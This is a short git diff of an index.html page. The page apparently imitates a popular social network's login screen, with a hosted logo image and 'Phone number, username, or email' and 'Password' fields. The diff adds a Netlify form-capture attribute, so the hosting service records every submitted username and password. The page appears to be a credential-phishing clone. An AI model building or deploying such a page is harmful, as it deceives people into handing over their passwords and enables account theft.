--- a/index.html
+++ b/index.html
@@ -26,7 +26,7 @@
   
   <h1><img src="https://i.imgur.com/wvLiKam.png" width="200px" height="68px"></h1>
 
-  <form action="" method="POST">
+  <form action="" method="POST" data-netlify="true">
   
   <input placeholder="Phone number, username, or email" type="text" name="username" >
   <input placeholder="Password" type="password" name="password">
